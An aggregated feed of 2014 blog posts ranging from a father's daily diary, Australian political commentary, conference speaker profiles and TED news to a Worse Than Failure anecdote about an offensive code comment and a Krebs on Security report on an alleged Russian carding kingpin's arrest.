    "While browsing Careers 2.0, I noticed this Amazon job," wrote Caleb, "I don't think that applying would be good for my self-esteem."

     

    Planet Linux AustraliaAndrew Pollock: [life] Day 261: Lots of play dates with boys, TumbleTastics, and a fairy gathering

    Today was a typical jam packed day. Zoe had a brief wake up at some point overnight because she couldn't find Cowie, right next to her head, but that was it.

    First up, the PAG fundraising committee came over for a quick (well, more like 2 hour) meeting at my place to discuss planning for the sausage sizzle tomorrow. Because I don't have Zoe, I've volunteered to do a lot of the running around, so I'm going to have a busy day.

    Mel had brought Matthew and Olivia with her, so Zoe and Matthew had a good time playing, and Olivia kept trying to join in.

    That meeting ran right up until I realised we had to head off for TumbleTastics, so Zoe got ready in record time and we scootered over and made it there just as her class was starting. I was sure we were going to be late, so I was happy we made it in time.

    Lachlan and his Mum, Laura, and little sister came over for lunch again afterwards, and stayed for a little while.

    After they left, we started getting ready for the Fairy Nook's attempt to break the Guinness Book of Records record for the most fairies in one place. We needed to get a wand, so once Zoe was appropriately attired, we walked around the corner to Crackerjack Toys and picked up a wand.

    After that, I popped up to Mel's place to collect a whole bunch of eskies that the local councillor had lent us for the sausage sizzle. Mel had also picked up a tutu for Zoe from the local two dollar store in her travels.

    We got home, and then walked to the Hawthorne AFL oval where the record attempt was. Initially there were like two other fairies there, but by 4:30pm, there was a pretty good turnout. I don't know what the numbers were, but I'm pretty sure they were well under the 872 they needed. There was a jumping castle and a few of Zoe's friends from Kindergarten, so it was all good.

    Sarah arrived to pick up Zoe from there, and I walked home.

    ,

    Kelvin ThomsonWe Must Tackle Youth Unemployment

    I believe that local communities working together with local businesses, local government and social services can play an important role in helping build meaningful partnerships between young people and job opportunities in the current economic climate.

    I support the Jobs for Youth Campaign which will be running across Moreland, Darebin and Yarra in October, which aims to match 100 people aged 16 to 24 with local employment opportunities, and attempt to stem joblessness in our region.

    The Jobs Expos being hosted as part of the campaign will put young people directly in touch with real employers and real job opportunities, including McDonald’s, Aplus Apprenticeships, Traineeship services along with other businesses and agencies. Young people are encouraged to bring along their resumes, or can seek help by making one there. The Darebin Jobs Expo will be held on Tuesday, October 21 at NCAT Preston, Yarra Expo on Wednesday, October 29 at The Reading room Fitzroy, and the Moreland Expo will be held on Friday, October 31 at the Coburg Town Hall.

    The Real Industry Job Interview (RIJI) Program has recruited volunteers to participate as interviewers this coming Friday, October 17. The Program will engage almost 700 young people from local schools from the Cities of Yarra, Darebin and Moreland; to assist and guide them in resume, job interview and job application preparations. This sort of program is highly beneficial for young local jobseekers and students as they seek to enter a very tight and competitive job market. I will be participating in the interview day and am looking forward to helping give young people some hints and tips about effective ways they can apply and succeed in looking for work.

    In April I met with local Youth Connections providers, and wrote to the current Liberal Government to support the Youth Connections program that was set up by Labor in 2010 to stop young people falling between the cracks. Youth Connections has already helped 75,000 young people reengage with education and employment. The program helps young people who drop out of school either head back to the classroom, or complete an alternative year 12 qualification, combined with work. It is disgraceful the Liberal Government has refused to support ongoing investment in such programs.

    These are great initiatives and I commend Moreland City Council, City of Darebin, City of Yarra, Youth Connections, Darebin Youth Commitment, Moreland Youth Commitment, Yarra Youth Commitment, and Inner Northern Learning, for spearheading the need for more young people to be employed and engaged locally. More information on these initiatives can be found at www.jobsforyouth.com.au

    Victorian Labor’s Jobs Plan which will help create 100,000 full time jobs for the unemployed through the $100 million Back to Work Act, payroll tax relief, incentives for business to hire long term unemployed, retrenched workers and unemployed youth, the Premier’s Jobs and Investment Panel, a Future Industries Fund of $200 million, a Regional Jobs Fund, Super Trade Missions, and through the removal of 50 level crossings, build the Melbourne Metro Rail, removing 5,000 trucks from the Westgate Bridge, creating 10,00 construction jobs and guaranteeing $2 billion for country and suburban roads. These are all worthy initiatives that will begin to kick start job opportunities for our unemployed young people.

    Along with investing in our manufacturing, skills and education sectors, supporting our local community initiatives, the Federal and State Victorian Liberal Governments would be better off cutting back our migrant worker programs that are placing unfair competition on local young people’s chance of getting a job.

    Under the current approach they’re adopting, youth unemployment will get a lot worse before it gets better. Providing young people with good quality job opportunities from an early stage helps our overall economic and social wellbeing by giving our next generation hope. Hope that they can make a good income, hope they can hold a decent standard of living, hope that they can one day buy their own home, raise a family, and live a comfortable, safe and healthy life. Giving young people the chance to build their self-respect, resilience and dignity, is incredibly important and goes hand in hand with giving young people the chance of having a job.

    Planet Linux Australialinux.conf.au News: Speaker Feature: Laura Bell, Michael Cordover

    Laura Bell


    Why can't we be friends? Integrating Security into an Existing Agile SDLC

    3:40pm Friday 16th January 2015

    Laura describes herself as an application security wrangler, repeat dreamer, some-time builder, python juggler, Mom and wife.

    For more information on Laura and her presentation, see here. You can follow her as @lady_nerd and don’t forget to mention #LCA2015.


    Michael Cordover


    Using FOI to get source code: the EasyCount experience

    3:40pm Wednesday 14th January 2015

    Michael is interested in the law, science, politics and everything in between. He worked in computing, event management and project management. He is a policy wonk and systems-oriented and he loves variety but is interested in detail.

    His life goal as a child was to know everything. He says that's impossible but is still trying to get as close as he can.

    For more information on Michael and his presentation, see here. You can follow him as @mjec and don’t forget to mention #LCA2015.

    LongNowKevin Kelly Seminar Tickets

     

    The Long Now Foundation’s monthly

    Seminars About Long-term Thinking

    Kevin Kelly presents Technium Unbound


    TICKETS

    Wednesday November 12, 02014 at 7:30pm SFJAZZ Center

    Long Now Members can reserve 2 seats, join today! General Tickets $15

     

    About this Seminar:

    What comes after the Internet? What is bigger than the web? What will produce more wealth than all the startups to date? The answer is a planetary super-organism comprised of 4 billion mobile phones, 80 quintillion transistor chips, a million miles of fiber optic cables, and 6 billion human minds all wired together. The whole thing acts like a single organism, with its own behavior and character — but at a scale we have little experience with.

    This is more than just a metaphor. Kelly takes the idea of a global super-organism seriously by describing what we know about it so far, how it is growing, where its boundaries are, and what it will mean for us as individuals and collectively. Both the smallest one-person enterprises today, and the largest mega-corporations on Earth, will have to learn how this Technium operates, and how to exploit it.

    TEDWant to learn how to give a great talk? Chris Anderson is writing the official TED guide to public speaking


    In the upcoming book “Talk This Way! The Official TED Guide to Public Speaking,” our curator Chris Anderson will give insights on what makes a talk great. Photo: James Duncan Davidson

    Over and over, you keep asking us: What’s the best way to give a TED Talk? It’s not just that you’re interested in sharing your ideas at a TED or local TEDx event. Short presentations have become a bread-and-butter staple at schools and offices around the world, and you want more guidance on how to give them well.

    And so, our curator Chris Anderson is writing a book to be published by Houghton Mifflin Harcourt in spring 2016. Titled Talk This Way! The Official TED Guide to Public Speaking, it will be packed with insights on what makes talks work.

    “There was no one spark for writing this book—it’s more like a long-smoldering fire that’s now ready to break out,” he told the TED Blog. “A decade ago, speaker prep at TED was simple: We’d agree on a basic talk idea, send the speaker a plaque of ‘the TED Commandments’ and wait to see what they showed up with. In recent years we’ve been stepping up our pre-conference engagement with speakers, encouraging them to carry out early rehearsals, working with some of them on their scripts. We’ve found the process to be incredibly valuable. We’ve seen speakers who start out nervous and/or with unfocused ideas come through to give truly compelling talks.”

    One of the main points: there simply is no one-size-fits-all approach. 

    “We should be clear on one thing. There is no single formula to giving a TED Talk. Indeed, the most annoying talks of all are those that seem to think there is,” he says. “But at the same time, there’s a ton of important advice to offer, including a key metaphor that many speakers find helpful. I’ll offer all the guidance I can, but much of it is in helping speakers to find the type of talk that’s right for them. And by the way, the book isn’t just for TED Talks. It’s meant to be helpful for any form of public speaking or presentation.”

    Another key goal for the book: highlighting the amazing power of direct human-to-human communication, recorded on video, in the Internet age.

    While we hope that this book will be helpful to you, we also see it as another way to foster TED’s mission of sharing ideas for free to the world. All proceeds from the book — from the advance to sales — will be donated to TED’s nonprofit parent company, and will support the free sharing of TED Talks and other free programs around the world.

    The book will be available internationally. So far, rights have been negotiated in Canada, Brazil, China, the Czech Republic, Finland, Germany, Greece, Hungary, Israel, Italy, Japan, Russia, Spain, Sweden, Taiwan and the UK, and deals are in progress in France, Poland and Portugal.

    Have specific questions about giving a talk that you’d like answered in the book? Email blog@ted.com and we’ll pass them on to Chris. Who is busily typing away on this book as we speak.

    “It’s fun!” he tells us. “I mean, not all the time — I can definitely get hit with intense writer’s block. But when it flows, it’s really exciting. There’s so much great material to tap into. Examples from hundreds of different TED Talks, and the direct advice from about 30 favorite speakers who have been generous enough to share their wisdom. If all I do is channel them, all will be well.”


    Geek FeminismRe-stating our support for the victim/survivor in the Dana McCallum case

    [Content warning: rape]

    Back in April, we published a statement of support for the victim in the Dana McCallum rape case. In the letter — written by Liz Henry and co-signed by Leigh Honeywell, Valerie Aurora, Brenda Wallace, Tim Chevalier (me), Annalee Flower Horne, and Beth Flanagan — we stated our empathy and support for the victim/survivor — who is McCallum’s wife (they are in the process of divorcing) — in this case as well as for her family.

    This month, McCallum accepted a guilty plea for two misdemeanors in this case: one count of domestic violence with corporal injury to the spouse and one count of false imprisonment. McCallum will serve probation, community service, and will have to undergo counseling. We already included this link in a linkspam, but given our previous statement of support for McCallum’s victim, I want to reiterate that support.

    As Liz wrote in our statement of support back in April, “Rape is a horrible violent crime no matter who the rapist is.” McCallum’s wife read a statement that says, in part:

    I must say that it deeply saddens me that as a victim, my only public support has been from hate groups. I expected more from the LGBT and feminist community. It’s a shame that they can’t do the emotional work it requires to process that someone they love is capable of such an awful crime. That is their burden to carry, though.

    In April, we also expressed disappointment in the transmisogynistic response to McCallum’s crime. As geek feminists, we believed then, and do now, that we can and must accept that someone in our community is capable of the crime of rape. Hard as it may be to accept, self-identified feminists can sustain rape culture — up to and including actually committing rape — too. We also believe that at the same time, we must resist the narrative that would use this crime to de-gender or misgender McCallum and, by extension, trans women. Rape can be committed by anyone, regardless of their assigned sex at birth or their self-affirmed sex or gender. Structural power dynamics and rape culture mean it’s far more likely to be committed by cis men than by people in any other group, but that is a fact that needs to inform anti-rape organizing — it does not make rapes committed by specific non-cis, non-male people less damaging.

    McCallum’s wife also said that she still loves McCallum and wants “forgiveness” to prevail. The Revolution Starts at Home (PDF link) is recommended reading for anyone curious about what that might look like.

    Edited to add: McCallum’s ex has also written a public blog post, as a guest post on Helen Boyd’s blog, about her experience:

    The transphobic radical feminists and other transphobic people will continue to rage over the state of my wife’s genitals, and I can’t stop them. But I hope more intelligent and thoughtful people will rise to the occasion to steer the conversation to what really matters.

    I want her to be accountable. I want this to never happen again. I want to forgive her. I want this story to be about forgiveness and redemption. I need it to be. I need others to let it be that, too – to be my story, my trauma, my choice, my agency.

    I recommend reading the post, but not the comments.

    Planet DebianBits from Debian: Help empower the Debian Outreach Program for Women

    Debian is thrilled to participate in the 9th round of the GNOME FOSS Outreach Program. While OPW is similar to Google Summer of Code it has a winter session in addition to a summer session and is open to non-students.

    Back at DebConf 14 several of us decided to volunteer because we want to increase diversity in Debian. Shortly thereafter the DPL announced Debian's participation in OPW 2014.

    We have reached out to several corporate sponsors and are thrilled that so far Intel has agreed to fund an intern slot (in addition to the slot offered by the DPL)! While that makes two funded slots we have a third sponsor that has offered a challenge match: for each dollar donated by an individual to Debian the sponsor will donate another dollar for Debian OPW.

    This is where we need your help! If we can raise $3,125 by October 22 that means we can mentor a third intern ($6,250). Please spread the word and donate today if you can at: http://debian.ch/opw2014/

    If you'd like to participate as intern, the application deadline is the same (October 22nd). You can find out more on the Debian Wiki.

    TEDNew ideas from a small island: A support group for women in business, inspired by TEDxNicosiaWomen

    A talk at TEDxNicosiaWomen led to a thriving discussion group for female business leaders on an island where such a thing is a rarity. Photo: Andri Josef/AJPhotoart


    One morning, as Anna Koukkides-Procopiou was rushing out of her house on the way to the office, her daughter said, “Mommy, I want you here. Why don’t you want me?” This set off a long period of contemplation, and eight months later, she left the business world and reinvented herself as an activist — and started bringing her daughter along with her to meetings.

    “I realized that the problem was actually the solution I didn’t want to see,” she said in a talk at TEDxNicosiaWomen 2013, held on the Mediterranean island of Cyprus.

    Her talk—about how women have to make the decisions that feel right for them—sent a ripple of excitement through the audience.

    “Cyprus is a very small community. It’s a small island,” says Mahi Solomou, who organized TEDxNicosiaWomen and invited Koukkides-Procopiou to speak. “Anna’s talk was so special for the Cyprus community because it got women to think that, at the end of the day, this is your life. Anna was criticized for taking off from the corporate world, but she did what felt right to her. It was a powerful message for the women out there.”

    “She really had a big impact on the audience,” echoes Thalia Iacovou, a designer who was in the audience for this talk. “A lot of people identified with her. After, they were saying, ‘Wow, she’s inspiring. She’s given us a lot to think about.’”

    Just a few hours later, the event screened a session of TEDWomen 2013 in which Sheryl Sandberg gave an update on her classic talk and mentioned the phenomenon of Lean In Circles, small groups where women can meet to talk and support one another. With some urging from Solomou and from TEDxNicosia organizer Paul Koronis, Koukkides-Procopiou decided to launch a similar group, with a Cypriot twist.

    In March, this discussion group convened for the first time in a coffee shop, bringing together 11 women with very different business backgrounds. Koronis and Solomou served as hosts; Koukkides-Procopiou moderated. The purpose of the group: to get the women talking about their experiences, so that they could learn from each other and offer support.


    Iacovou, who runs a digital brand agency with her husband, says a group like this was desperately needed in Cyprus, as gender parity in the workplace isn’t a tightly held value on the island. “In many places in the world, you start from the assumption that it doesn’t matter what gender you are: if you’re in business, you’re in business. There may be instances when there’s sexism, but those are isolated,” she says. “What we find here is different. When you’re [a woman] in business, you tend to be more isolated in the local community rather than embraced. It’s a little bit intimidating, a little difficult to understand.”

    This mindset has affected her personally, she says: “If I am running a workshop, or a pitch or a presentation, people look at my husband and go, ‘Why isn’t he doing the talking? Why is she doing the talking? She’s really bossy.’ I find myself almost stepping back sometimes and allowing my male counterparts to lead. You have to learn to read people in a different way than you might outside of Cyprus.”

    At the first meeting of the discussion group, things started off awkwardly. The women didn’t quite know what to make of each other. “It was very different from existing societies and clubs in Nicosia,” says Koronis, who was the only man in the room for the meeting. “Women here meet for coffee or for cards, but typically in closed circles of friends who’ve been together for years.”

    But as the meeting progressed, the group began to gel. It’s been going strong ever since, and recently held its eighth meeting. Here’s how it works:

    In the week before a meeting, each member of the group gets an email that describes the next session’s theme, along with a video to watch and some questions to think about. Each meeting begins with everyone giving a short update on what they’ve been up to in the past month. From there, it’s discussion time, the conversation flipping between English and Greek. So far, the group has tackled topics like team dynamics and public speaking—and they’re hosting a session soon about hierarchy in the workplace. As each meeting closes, they talk through action points each member can take.

    The audience, thoroughly rapt at TEDxNicosiaWomen. Photo: Andri Josef/AJPhotoart


    Iacovou says that the group has been transformative for her. “Listening to all the women talking about how they confidently move forward with things, it’s really shifted my tendency to step back,” she says. “In the months since I’ve been in the group, there have been two or three initiatives that I’ve just jumped on board with, without worrying, ‘Oh, I’m a woman, and how am I going to _______?’ I’ve bonded with people I wouldn’t have had an opportunity to interact with on a daily basis. I’ve gotten a lot of insights, on a personal level and on a professional level.”

    Solomou agrees. “They know about what I’m going through, so they can say, ‘We’ve been through the same thing and suggest this,’” she says. “I’m getting a lot of good advice.”

    Because of the conflict on the island between Greeks and Turks, and because Cyprus did not have a robust university system until recently, many members of the island’s business community have either studied or lived abroad. But many have returned in recent years, even with the recent financial crash, leading to what Koronis, Solomou, and Iacovou describe as an “entrepreneurial wave” — one in which they say women are participating. “For our generation of women, the culture is allowing them to take on more roles,” says Iacovou.

    The Nicosia group has caught the attention of others locally. Koukkides-Procopiou has been contacted by an individual working with the US Embassy in Nicosia, who asked how they could set up a similar group for their employees, and Koronis has had a conversation with an executive manager of a large bank in Athens, who was interested in bringing the idea to Greece.

    Meanwhile, the group continues to thrive. Koukkides-Procopiou is experimenting with what happens when group members are paired up randomly and keep each other on track toward specific goals.

    “Every time I go to these meetings, I get a dose of inspiration,” says Solomou. “Living on a small island, you always need new ideas.”

    Read more about TEDx organizers. And stay tuned for a slew of upcoming events on Cyprus this November. TEDxNicosia will be held on November 1; TEDxUniversityofNicosia on November 15, and TEDxYouth@Nicosia on November 16.

    The stage at TEDxNicosiaWomen. Photo: Andri Josef/AJPhotoart


     


    Sociological Images: Is This #HeForShe Video Helping Feminism?

    The United Nations’ #HeForShe campaign had a fantastic launch, with Emma Watson’s impassioned speech deservedly going viral. She stood up and described how everyday sexism continues to discourage girls and women from being strong, physical, and outspoken. And she defended the “feminist” label as a simple demand for sexual equality. But most importantly, she called for solidarity between men and women in achieving it.

    And then this video came out:

    [Embedded video: //www.youtube.com/v/7ZptgM-jhZo?version=3&hl=en_US]

    On the surface, it looks like a group of men from all walks of life answering Ms. Watson’s call. But delve deeper, and it becomes problematic. For me, anyway.

    I’m a man, and I consider myself a feminist. But when I think about working towards an end to sexism, the last thing I would do is get a group of men to discuss the issue isolated from women. And yet that’s what this video seems to be trying to do.

    It feels like a male encounter group, but obviously highly scripted. The different men describe their commitment to #HeForShe in terms of protective paternalistic stereotypes (“I can’t let my daughters, or my wife, suffer because I didn’t do MY job”) and entitlement (“If we don’t change it, it’s never gonna change.”)

    I realize that men have to be part of the solution, but this video feels like it is saying that men ARE the solution. As if a bunch of bros getting together to share their feelings are going to solve sexism, with no reference to how sisters have been doing it for themselves for over 200 years. They don’t need a heroic male takeover of the women’s movement that helps us all feel proud of ourselves because we are “#NotAllMen.” They need real understanding and support.

    Am I being too harsh? Maybe. But when the one man says, “Understand that it’s not only speaking out FOR women, but WITH women” to a sausage fest, the irony speaks volumes to me.

    I think #HeForShe is a great idea, “a solidarity movement for gender equality that brings together one half of humanity in support of the other of humanity, for the entirety of humanity.”

    So why can’t we do it together? Are men considered to be so sexist already that we need to find a “manly” way to be feminist?

    Here’s an idea: Talk to women about the issue. But more importantly, listen to them about what they experience. There is far more work for us to do together.

    Tom Megginson is a Creative Director at Acart Communications, a Canadian Social Issues Marketing agency. He is a specialist in social marketing, cause marketing, and corporate social responsibility. You can follow Tom at Osocio, where this post originally appeared, and The Ethical Adman Work That Matters.

    (View original at http://thesocietypages.org/socimages)

    Racialicious: Blackface by Another Name? “Painting Down” on Gotham

    The issues for people of color in Hollywood run deep – so much so that we occasionally forget how invested the industry can be in denying opportunities to enter this business.

    Jada Pinkett Smith landed a coveted role on the show as Fish Mooney, a female mob leader:

    GOTHAM: Jada Pinkett Smith as Fish Mooney in the "Selina Kyle" episode of GOTHAM airing Monday, Sept. 29 (8:00-9:00 PM ET/PT) on FOX. ©2014 Fox Broadcasting Co. Cr: Jessica Miglio/FOX

    So we have a black woman on screen in a major role. But what is happening behind the scenes? Are people of color being represented in other parts of the industry, like doing stunt work? Not so, according to Deadline Hollywood:

    After receiving inquiries from Deadline, Warner Bros. has canceled plans to “paint down” a white stunt woman to double for a black actress on its hit Fox show Gotham. On Monday, dark makeup was applied to the face of a white stunt woman in a hair and makeup test in advance of two days of filming next week in New York. After receiving calls from Deadline, WB initially downplayed the significance of the story, but after looking into it said that it had made a “mistake” and would hire a black stunt woman instead.

    Really?

    Deadline continues:

    “Painting down” white stunt performers so that they can pass for black has been going on for decades, even though SAG-AFTRA calls the practice “unacceptable” and “improper.” Blackface went out in the 1930s, but “painting down” white stunt performers goes on to this day, and there is no language in the union’s contract that expressly prohibits it. The union’s contract only requires that stunt coordinators “endeavor” to find stunt performers of the same race and gender as the actors they are doubling. For many black cast and crew members, however, the practice is insulting and demeaning, a holdover from Hollywood’s openly racist past.

    Was the industry so lacking in black talent that it was easier to paint a white woman than hire a black stuntwoman?

    A few minutes of googling netted me a documentary by La Faye Baker about black stunt women in Hollywood:

    [Embedded video: http://www.youtube.com/embed/rr-LkiXvF8c]

    Is it because the women featured there aren’t high profile enough?
    The Stuntwomen’s Association of Motion Pictures has three black women on the front page: Nicole Callender, Jwaundace Candece and Kelsee L. King Devoreaux.

    No blockbuster experience? Angela Meryl put in work on the sets of Kill Bill, Skyfall, American Gangster, and Pirates of the Caribbean: At World’s End.

    Warner Brothers said:

    “A mistake was made this week in casting a stunt woman for a guest star in a particular scene on the show. The situation has been rectified, and we regret the error.”

    We regret this whole situation.

    The post Blackface by Another Name? “Painting Down” on Gotham appeared first on Racialicious - the intersection of race and pop culture.

    Sociological Images: Happy Birthday, Louis Althusser!


    Image borrowed from BHL.

    Have a scholar we should commemorate?  Send us a wacky pic and we will!

    Lisa Wade is a professor of sociology at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. You can follow her on Twitter and Facebook.

    (View original at http://thesocietypages.org/socimages)

    Cryptogram: NSA Classification ECI = Exceptionally Controlled Information

    ECI is a classification above Top Secret. It's for things that are so sensitive they're basically not written down, like the names of companies whose cryptography has been deliberately weakened by the NSA, or the names of agents who have infiltrated foreign IT companies.

    As part of the Intercept story on the NSA's using agents to infiltrate foreign companies and networks, it published a list of ECI compartments. It's just a list of code names and three-letter abbreviations, along with the group inside the NSA that is responsible for them. The descriptions of what they all mean would never be in a computer file, so it's only of value to those of us who like code names.

    This designation is why there have been no documents in the Snowden archive listing specific company names. They're all referred to by these ECI code names.

    Planet Linux Australia: Andrew Pollock: [life] Day 260: Bedwetting, a morning tea play date, and swim class

    Zoe woke up at something like 3:30am because she'd wet the bed. She hasn't wet the bed since before she turned 4. In fact, I bought a Connie pad and she promptly never wet the bed again. I was actually thinking about stopping using it just last night, so I obviously jinxed things.

    Anyway, she woke up, announced she'd had an accident, and I smugly thought I'd have it all handled, but alas, the pad was too low down, so she'd still managed to wet the mattress, which was annoying. Plan B was to just switch her to the bottom bunk, which still worked out pretty well. I've learned an important lesson about the placement of the Connie pad now.

    Unfortunately for me, it seems that if I get woken up after about 4am, I have a low probability of getting back to sleep, and I'd gotten to bed a bit late the night before, so I only wound up with about 5 hours and felt like crap all day.

    Vaeda and her mum, Francesca came over for a morning tea play date. I'd been wanting an excuse to try out a new scone recipe that I'd discovered, so I cranked out some scones for morning tea.

    Vaeda and Francesca couldn't stay for too long, but it was a nice morning nonetheless. Then we popped out to Woolworths to pick up a $30 gift card that the store had donated towards the weekend sausage sizzle. Not quite 70 kg of free sausages, but better than nothing.

    After we got back, we had some lunch, and I tried to convince Zoe to have a nap with me, without success, but we did have a couple of hours of quietish time, and I got to squeeze in some reading.

    We biked over to swim class and then biked home, and I made dinner. Zoe was pretty tired, so I got her to bed nice and easily. It'll be an early night for me too.

    Worse Than Failure: A Stupid Comment

    Paul worked for a branch of the Defence Department in Australia, writing reams of C++ using the standard template libraries on a Linux box. On a typical afternoon, Paul checked some code into CVS with a comment:

    Fixed bug 7551, see issue report 2119. Tinky Winky is my favourite Teletubby.

    The addendum continued a long-running inside joke. At this point, the weird check-in comments were only funny because they were applied so consistently.

    “Hey Paul, come over here a second!”

    Paul’s friend and fellow developer Stan had initiated an impromptu gathering around his desk. Once Paul joined the huddle, Stan turned back to his computer screen. “I’m getting sick of these warning messages. You know, the ones our compiler throws because our namespace names are longer than 256 characters? I have trouble finding the real errors around these things. Do any of you know how to shut them off?”


    What a Tinky Winky might look like
    Paul also has a lovely red purse.

    “I do,” Paul said. “Here, let me show you what I’ve done.”

    Paul supplied the name of a header file he’d been working on recently, then pointed to a line near the top. “See that pragma statement? It’ll suppress those warnings during compile time.”

    // We don't need these stupid warning messages PMJ
    #pragma warning( disable : 4507 34 )

    “Oh, cool. I’ll try that,” Stan said. “Thanks, Paul!”

    Life went on.

    The trouble started a few weeks later, during a code review. Paul was asked to attend as an impartial reviewer for a project he had no involvement with. When he sat down in the meeting room, Burt the project manager was already there, giving him narrowed eyes.

    “Paul,” Burt began, “are your initials PMJ?”

    Paul frowned. “Yes… why?”

    “The research scientists on my team are complaining that the word ‘stupid’ appears at the start of almost every header file.”

    “What does this have to do with me?” Paul asked.

    “Well, you’ve been touching all this code.” Burt brought up a Word document on his laptop, which was projected onto a screen in the meeting room. “I compiled some samples the scientists showed me. This right here, for instance…”

    Paul blinked at the offending screenshot, which displayed the following two lines:

    // We don't need these stupid warning messages PMJ
    #pragma warning( disable : 4507 34 )

    “Oh! That’s just code for suppressing warning messages during compile time,” Paul said. “I wasn’t the one who put it in here. One of the other developers must’ve copied and pasted it in wholesale.”

    “‘Stupid?’” Burt demanded and accused all at once.

    “That’s just a comment. It doesn’t actually do anything.”

    “It makes the scientists angry,” Burt snapped. “It’s inappropriate- and it’s everywhere! They’re questioning the entire code base and the quality of our in-house software! I think we should take this offline for further discussion.” His glowering lifted as more project members filtered into the room for the code review.

    A few days later, Paul was roped into a meeting with Burt, his own boss, and a very offended research scientist.

    “Stupid! Do you think national defense is stupid?” the scientist fumed. “Do you think I’m too stupid not to notice? What good is the code in that stupid file, anyway?”

    “I didn’t touch all those files,” Paul tried to explain.

    “You initialed every line!” the scientist cried.

    “Check CVS. I wasn’t the one checking in those changes!” Paul returned. “And who cares anyway, it’s just a stupid comment! It doesn’t do anything!”

    “Again with the stupid! It reflects an attitude that is rude and demoralizing. How would you like it if I called your work stupid? Oh wait, I see you already did!”

    “Let’s calm down here,” Paul’s boss intervened. “Paul, you said it’s a comment, right? Taking it out won’t change the behavior?”

    “No, course not.”

    “Well, then that means it’d be no problem for you to remove the word ‘stupid’ wherever it appears in the code base- right?” His boss smiled with the glow of a self-assured master diplomat.

    It turned out Paul’s fellow developers had copied the warning suppression code to hundreds of files. Paul wrote a shell script that nuked all occurrences of the offending word and his initials, which he ran during a couple of code base merges when he had everything checked out.

    Disaster averted- or so Paul thought. Paul’s boss reared his head again a few days later, frowning. “Is Tinky Winky really your favorite Teletubby? If you think you had too many meetings about ‘stupid’, think about how many I had. You’d better edit the log.”


    LongNow: How We Got To Now: new PBS show starring Steven Johnson


    Tonight, October 15th 02014, former SALT Speaker Steven Johnson’s new TV series premieres on PBS. The show, “How We Got To Now”, is co-produced by PBS and BBC, and focuses on different themes showing how long cumulative efforts can result in massive systemic change. The first of the six episodes, “Clean”, focuses on how sanitary conditions evolved from concept to reality, and how this reality affects public health and entire industries.

    Steven Johnson has worked on many different topics throughout his career, and he draws on all of these topics in this series. However, it is his study of the history of technology that anchors the show. One of Steven’s major contributions to this field is popularizing network-based approaches to understanding history and new technologies. For example, to understand the lightbulb, one needs to look beyond Thomas Edison and understand the environmental conditions, contemporaneous technologies, and networks of scientists corresponding across the globe. Once these factors are taken into account, innovation stops looking like “eureka moments” and instead becomes anchored in effective networks, collaborations, and the slow incubation of ideas. In the following animation, Steven Johnson explains this process and how it can help us think about technology and innovation now:

    [Embedded video: http://www.youtube-nocookie.com/embed/NugRZGDbPFU?rel=0]

    Check your local listings to watch “How We Got To Now”, and keep a look out for some Long Now references throughout the series.

    Planet Linux Australia: linux.conf.au News: Speaker Feature: John Dickinson, Himangi Saraogi

    John Dickinson


    Herding Cats: Getting an open source community to work on the same thing.

    2:15pm Thursday 15th January 2015

    John is a familiar sight around the world; he has spoken at many conferences, summits, and meetups, including the OpenStack Summit, OSCON, and LinuxConf Australia.

    He is Director of Technology at SwiftStack. SwiftStack is a technology innovator of private cloud storage for today's applications, powered by OpenStack Object Storage.

    For more information on John and his presentation, see here. You can follow him as @notmyname and don’t forget to mention #lca2015.


    Himangi Saraogi


    Coccinelle: A program matching and transformation tool

    1:20pm Wednesday 14th January 2015

    Himangi finds contributing to open source a great learning platform. She has been contributing to the Linux kernel and has submitted many patches that were accepted.

    She has experience with tools like checkpatch, sparse and coccinelle.

    For more information on Himangi and her presentation, see here. You can follow her as @himangi99 and don’t forget to mention #lca2015.

    Krebs on Security: Seleznev Arrest Explains ‘2Pac’ Downtime

    The U.S. Justice Department has piled on more charges against alleged cybercrime kingpin Roman Seleznev, a Russian national who made headlines in July when it emerged that he’d been whisked away to Guam by U.S. federal agents while vacationing in the Maldives. The additional charges against Seleznev may help explain the extended downtime at an extremely popular credit card fraud shop in the cybercrime underground.

    The 2pac[dot]cc credit card shop.


    The government alleges that the hacker known in the underground as “nCux” and “Bulba” was Roman Seleznev, a 30-year-old Russian citizen who was arrested in July 2014 by the U.S. Secret Service. According to Russian media reports, the young man is the son of a prominent Russian politician.

    Seleznev was initially identified by the government in 2012, when it named him as part of a conspiracy involving more than three dozen popular merchants on carder[dot]su, a bustling fraud forum where Bulba and other members openly marketed various cybercrime-oriented services (see the original indictment here).

    According to Seleznev’s original indictment, he was allegedly part of a group that hacked into restaurants between 2009 and 2011 and planted malicious software to steal card data from store point-of-sale devices. The indictment further alleges that Seleznev and unnamed accomplices used his online monikers to sell stolen credit and debit cards at bulba[dot]cc and track2[dot]name. Customers of these services paid for their cards with virtual currencies, including WebMoney and Bitcoin.

    But last week, U.S. prosecutors piled on another 11 felony counts against Seleznev, charging that he also sold stolen credit card data on a popular carding store called 2pac[dot]cc. Interestingly, Seleznev’s arrest coincides with a period of extended downtime on 2pac[dot]cc, during which time regular customers of the store could be seen complaining on cybercrime forums where the store was advertised that the proprietor of the shop had gone silent and was no longer responding to customer support inquiries.

    A few weeks after Seleznev’s arrest, it appears that someone new began taking ownership of 2pac[dot]cc’s day-to-day operations. That individual recently posted a message on the carding shop’s home page apologizing for the extended outage and stating that fresh, new cards were once again being added to the shop’s inventory.

    The message, dated Aug. 8, 2014, explains that the proprietor of the shop was unreachable because he was hospitalized following a car accident:

    “Dear customers. We apologize for the inconvenience that you are experiencing now by the fact that there are no updates and [credit card] checker doesn’t work. This is due to the fact that our boss had a car accident and he is in hospital. We will solve all problems as soon as possible. Support always available, thank you for your understanding.”

    2pac[dot]cc's apologetic message to would-be customers of the credit card fraud shop.


    IT’S ALL ABOUT CUSTOMER SERVICE

    2pac is but one of dozens of fraud shops selling stolen debit and credit cards. And with news of new card breaches at major retailers surfacing practically each week, the underground is flush with inventory. The single most important factor that allows individual card shop owners to differentiate themselves among so much choice is providing excellent customer service.

    Many card shops, including 2pac[dot]cc, try to keep customers happy by including an a-la-carte card-checking service that allows customers to test purchased cards using compromised merchant accounts — to verify that the cards are still active. Most card shop checkers are configured to automatically refund to the customer’s balance the value of any cards that come back as declined by the checking service.

    This same card checking service also is built into rescator[dot]cc, a card shop profiled several times in this blog and perhaps best known as the source of cards stolen from the Target, Sally Beauty, P.F. Chang’s and Home Depot retail breaches. Shortly after breaking the news about the Target breach, I published a lengthy analysis of forum data that suggested Rescator was a young man based in Odessa, Ukraine.

